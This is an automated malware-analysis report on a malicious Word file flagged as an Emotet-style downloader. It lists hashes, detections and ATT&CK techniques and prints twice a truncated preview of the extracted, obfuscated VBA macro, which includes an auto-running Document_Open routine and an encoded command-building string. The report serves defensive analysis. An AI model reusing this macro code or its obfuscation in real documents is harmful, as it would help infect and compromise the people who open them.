Office (OLE) malware analysis — malicious · 0b8b16ca69d4e789

MALICIOUS

Office (OLE)

137.0 KB Created: 2018-04-23 21:48:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: b294db07734a9c42f8e7fdc1a975ebec SHA-1: fc8d4d82fd868658b99db7a2d6151dcfa2d0de26 SHA-256: 0b8b16ca69d4e7897b5f374d9f6866b8aed5f498f0032fde2c16ec7d82a1bec0

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, and the 'Document_Open' macro suggests automatic execution upon opening. This points to the document's primary function being to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.

Heuristics 5

ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45308 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45308 bytes
SHA-256: `ec89f46b0208eaa655fbff2bccc4893a496dd698b6e0df60d1f04b386878e1c3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "WiaiLmFKj" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub mdjsI(tToDl) qzQYYW = 17942 - CDbl(12207 / Int(81949) - 16820 / Round(86044 / CSng(1615 - CByte(77590)))) * XuVXC * Fix(6817) - 11712 / CByte(kFupD) / MrvTVa - CBool(61509) / iHqGY / Atn(84156) End Sub Sub dkfEz(zzQAhm) NKijTY = 88569 - CDbl(99073 / Int(25388) - 49080 / Round(60446 / CSng(27373 - CByte(59805)))) * LOhwi * Fix(27555) - 7336 / CByte(UOkGG) / tfSnn - CBool(8862) / YcGmAz / Atn(22021) KzqSI = 77418 - CDbl(67228 / Int(67514) - 6959 / Round(6101 / CSng(46109 - CByte(45323)))) * pQwNR * Fix(63699) - 11616 / CByte(Graahm) / aJiQsp - CBool(19535) / unwYK / Atn(92232) kPhji = 23958 - CDbl(15432 / Int(49643) - 66808 / Round(31894 / CSng(10412 - CByte(66206)))) * IPrbB * Fix(93995) - 16292 / CByte(YHfRfB) / ZTIvm - CBool(83011) / KtAEZ / Atn(35804) End Sub Sub vAmHFG(wXXNnV) IBPCK = 7253 - CDbl(1228 / Int(29900) - 15654 / Round(19039 / CSng(92798 - CByte(25261)))) * FwawX * Fix(80487) - 19404 / CByte(HsKZvZ) / vlhwVv - CBool(4036) / lBOOjf / Atn(84427) LsFZzw = 50595 - CDbl(81527 / Int(95459) - 21806 / Round(65548 / CSng(2257 - CByte(18437)))) * dPiXT * Fix(44218) - 53907 / CByte(rEDGpv) / bazPP - CBool(98646) / pAizKr / Atn(2009) End Sub Private Sub Document_open() On Error Resume Next NAijY = 97475 - CDbl(70608 / Int(22168) - 23765 / Round(40216 / CSng(1976 - CByte(25987)))) * AWrGi * Fix(64994) - 43528 / CByte(kluFwa) / sUMkwj - CBool(82812) / YJXJq / Atn(29505) Application.Run uOlfoi + "CqRtfVF" + sjJiZd, nbcXG + LQJcjCruJYrCJ + sIQQU TSzHX = 62199 - CDbl(40640 / Int(99058) - 83184 / Round(61955 / CSng(37824 - CByte(31869)))) * zFbjaS * Fix(13569) - 26692 / CByte(kivljw) / lzULiK - CBool(40239) / YlwEdX / Atn(14294) End Sub Sub LlHNR(pwNvjh) MlwYG = 10602 - CDbl(66369 / Int(97803) - 10117 / Round(14799 / CSng(80030 - CByte(69574)))) * HpUCkP * Fix(56807) - 51569 / CByte(AcibJI) / widnf - CBool(23785) / BjWSYI / Atn(11908) RdlVAi = 21237 - CDbl(22549 / Int(34074) - 8093 / Round(78054 / CSng(54592 - CByte(72581)))) * piwac * Fix(13923) - 48115 / CByte(wAvpS) / NwESd - CBool(42733) / FqnHr / Atn(74963) LirjO = 62602 - CDbl(81739 / Int(84617) - 42259 / Round(97159 / CSng(60752 - CByte(97985)))) * FjkaL * Fix(22854) - 78871 / CByte(UzWwPJ) / oISlUC - CBool(1541) / ILbmf / Atn(40841) End Sub Sub GmiRFY(NwfzY) jUlwWG = 7132 - CDbl(25908 / Int(61032) - 88183 / Round(59032 / CSng(5619 - CByte(8360)))) * cOkZJ * Fix(56255) - 88796 / CByte(jUwELi) / WGWdKi - CBool(76750) / cPZRN / Atn(50696) End Sub Sub zOBGdz(Fovwp) RASuVS = 17909 - CDbl(75778 / Int(16171) - 48689 / Round(88728 / CSng(76632 - CByte(77124)))) * HJkLjT * Fix(82022) - 38612 / CByte(CFEvKA) / iNoCIc - CBool(93988) / wuRFro / Atn(13858) pKEvE = 68256 - CDbl(29929 / Int(43787) - 90018 / Round(94400 / CSng(31358 - CByte(30699)))) * QXzmaq * Fix(62217) - 98280 / CByte(jfNFPm) / lcuvm - CBool(29145) / FEdwwR / Atn(14697) End Sub Attribute VB_Name = "MjpfXRSQ" Sub aTDiZi(UdUJUV) CBmth = 94555 - CDbl(84675 / Int(65627) - 63717 / Round(57724 / CSng(39310 - CByte(36764)))) * PjPkSL * Fix(94045) - 39783 / CByte(LHfWi) / VzwrqM - CBool(74250) / kYkTGs / Atn(73589) End Sub Function LQJcjCruJYrCJ() On Error Resume Next JZdsc = 22539 - CDbl(37863 / Int(27772) - 37389 / Round(58166 / CSng(64514 - CByte(54346)))) * PiMJFM * Fix(68126) - 59475 / CByte(HqIcU) / hMRUA - CBool(71228) / MWcFU / Atn(32437) vqAtmKBHuf = MAioa("Pc1.classeoN.Spli'+'t(eNk9+Nk9oN@eNk9+Nk9oNk9+N'+'k9N);Nk9+Nk9vh'+'tSDCNk9+Nk9 = vhNk9+Nk9teNk9+Nk9nNk'+'9+O8R0d1", ZUwmj - ZUwmj + 4 + ZUwmj - ZUwmj, ZUwmj - ZUwmj + 104 + ZUwmj - ZUwmj) ckHjHi = 44481 - CDbl(55576 / Int(96505) - 94964 / Round(38870 / CSng(81664 - CByte(83876)))) * Smjzr * Fix(27924) - 64137 / CByte(NNbww) / pjArS - CBool(7431) / WicVpi / Atn(8066) SwOiSt = 7651 - CDbl(23025 / Int(90276) - 43316 / Round(82698 / CSng(58448 ... (truncated)

SHA-256: ec89f46b0208eaa655fbff2bccc4893a496dd698b6e0df60d1f04b386878e1c3

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "WiaiLmFKj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub mdjsI(tToDl)
qzQYYW = 17942 - CDbl(12207 / Int(81949) - 16820 / Round(86044 / CSng(1615 - CByte(77590)))) * XuVXC * Fix(6817) - 11712 / CByte(kFupD) / MrvTVa - CBool(61509) / iHqGY / Atn(84156)
End Sub
Sub dkfEz(zzQAhm)
NKijTY = 88569 - CDbl(99073 / Int(25388) - 49080 / Round(60446 / CSng(27373 - CByte(59805)))) * LOhwi * Fix(27555) - 7336 / CByte(UOkGG) / tfSnn - CBool(8862) / YcGmAz / Atn(22021)
KzqSI = 77418 - CDbl(67228 / Int(67514) - 6959 / Round(6101 / CSng(46109 - CByte(45323)))) * pQwNR * Fix(63699) - 11616 / CByte(Graahm) / aJiQsp - CBool(19535) / unwYK / Atn(92232)
kPhji = 23958 - CDbl(15432 / Int(49643) - 66808 / Round(31894 / CSng(10412 - CByte(66206)))) * IPrbB * Fix(93995) - 16292 / CByte(YHfRfB) / ZTIvm - CBool(83011) / KtAEZ / Atn(35804)
End Sub
Sub vAmHFG(wXXNnV)
IBPCK = 7253 - CDbl(1228 / Int(29900) - 15654 / Round(19039 / CSng(92798 - CByte(25261)))) * FwawX * Fix(80487) - 19404 / CByte(HsKZvZ) / vlhwVv - CBool(4036) / lBOOjf / Atn(84427)
LsFZzw = 50595 - CDbl(81527 / Int(95459) - 21806 / Round(65548 / CSng(2257 - CByte(18437)))) * dPiXT * Fix(44218) - 53907 / CByte(rEDGpv) / bazPP - CBool(98646) / pAizKr / Atn(2009)
End Sub
Private Sub Document_open()
On Error Resume Next
NAijY = 97475 - CDbl(70608 / Int(22168) - 23765 / Round(40216 / CSng(1976 - CByte(25987)))) * AWrGi * Fix(64994) - 43528 / CByte(kluFwa) / sUMkwj - CBool(82812) / YJXJq / Atn(29505)
Application.Run uOlfoi + "CqRtfVF" + sjJiZd, nbcXG + LQJcjCruJYrCJ + sIQQU
TSzHX = 62199 - CDbl(40640 / Int(99058) - 83184 / Round(61955 / CSng(37824 - CByte(31869)))) * zFbjaS * Fix(13569) - 26692 / CByte(kivljw) / lzULiK - CBool(40239) / YlwEdX / Atn(14294)
End Sub
Sub LlHNR(pwNvjh)
MlwYG = 10602 - CDbl(66369 / Int(97803) - 10117 / Round(14799 / CSng(80030 - CByte(69574)))) * HpUCkP * Fix(56807) - 51569 / CByte(AcibJI) / widnf - CBool(23785) / BjWSYI / Atn(11908)
RdlVAi = 21237 - CDbl(22549 / Int(34074) - 8093 / Round(78054 / CSng(54592 - CByte(72581)))) * piwac * Fix(13923) - 48115 / CByte(wAvpS) / NwESd - CBool(42733) / FqnHr / Atn(74963)
LirjO = 62602 - CDbl(81739 / Int(84617) - 42259 / Round(97159 / CSng(60752 - CByte(97985)))) * FjkaL * Fix(22854) - 78871 / CByte(UzWwPJ) / oISlUC - CBool(1541) / ILbmf / Atn(40841)
End Sub
Sub GmiRFY(NwfzY)
jUlwWG = 7132 - CDbl(25908 / Int(61032) - 88183 / Round(59032 / CSng(5619 - CByte(8360)))) * cOkZJ * Fix(56255) - 88796 / CByte(jUwELi) / WGWdKi - CBool(76750) / cPZRN / Atn(50696)
End Sub
Sub zOBGdz(Fovwp)
RASuVS = 17909 - CDbl(75778 / Int(16171) - 48689 / Round(88728 / CSng(76632 - CByte(77124)))) * HJkLjT * Fix(82022) - 38612 / CByte(CFEvKA) / iNoCIc - CBool(93988) / wuRFro / Atn(13858)
pKEvE = 68256 - CDbl(29929 / Int(43787) - 90018 / Round(94400 / CSng(31358 - CByte(30699)))) * QXzmaq * Fix(62217) - 98280 / CByte(jfNFPm) / lcuvm - CBool(29145) / FEdwwR / Atn(14697)
End Sub

Attribute VB_Name = "MjpfXRSQ"
Sub aTDiZi(UdUJUV)
CBmth = 94555 - CDbl(84675 / Int(65627) - 63717 / Round(57724 / CSng(39310 - CByte(36764)))) * PjPkSL * Fix(94045) - 39783 / CByte(LHfWi) / VzwrqM - CBool(74250) / kYkTGs / Atn(73589)
End Sub
Function LQJcjCruJYrCJ()
On Error Resume Next
JZdsc = 22539 - CDbl(37863 / Int(27772) - 37389 / Round(58166 / CSng(64514 - CByte(54346)))) * PiMJFM * Fix(68126) - 59475 / CByte(HqIcU) / hMRUA - CBool(71228) / MWcFU / Atn(32437)
vqAtmKBHuf = MAioa("Pc1.classeoN.Spli'+'t(eNk9+Nk9oN@eNk9+Nk9oNk9+N'+'k9N);Nk9+Nk9vh'+'tSDCNk9+Nk9 = vhNk9+Nk9teNk9+Nk9nNk'+'9+O8R0d1", ZUwmj - ZUwmj + 4 + ZUwmj - ZUwmj, ZUwmj - ZUwmj + 104 + ZUwmj - ZUwmj)
ckHjHi = 44481 - CDbl(55576 / Int(96505) - 94964 / Round(38870 / CSng(81664 - CByte(83876)))) * Smjzr * Fix(27924) - 64137 / CByte(NNbww) / pjArS - CBool(7431) / WicVpi / Atn(8066)
SwOiSt = 7651 - CDbl(23025 / Int(90276) - 43316 / Round(82698 / CSng(58448
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.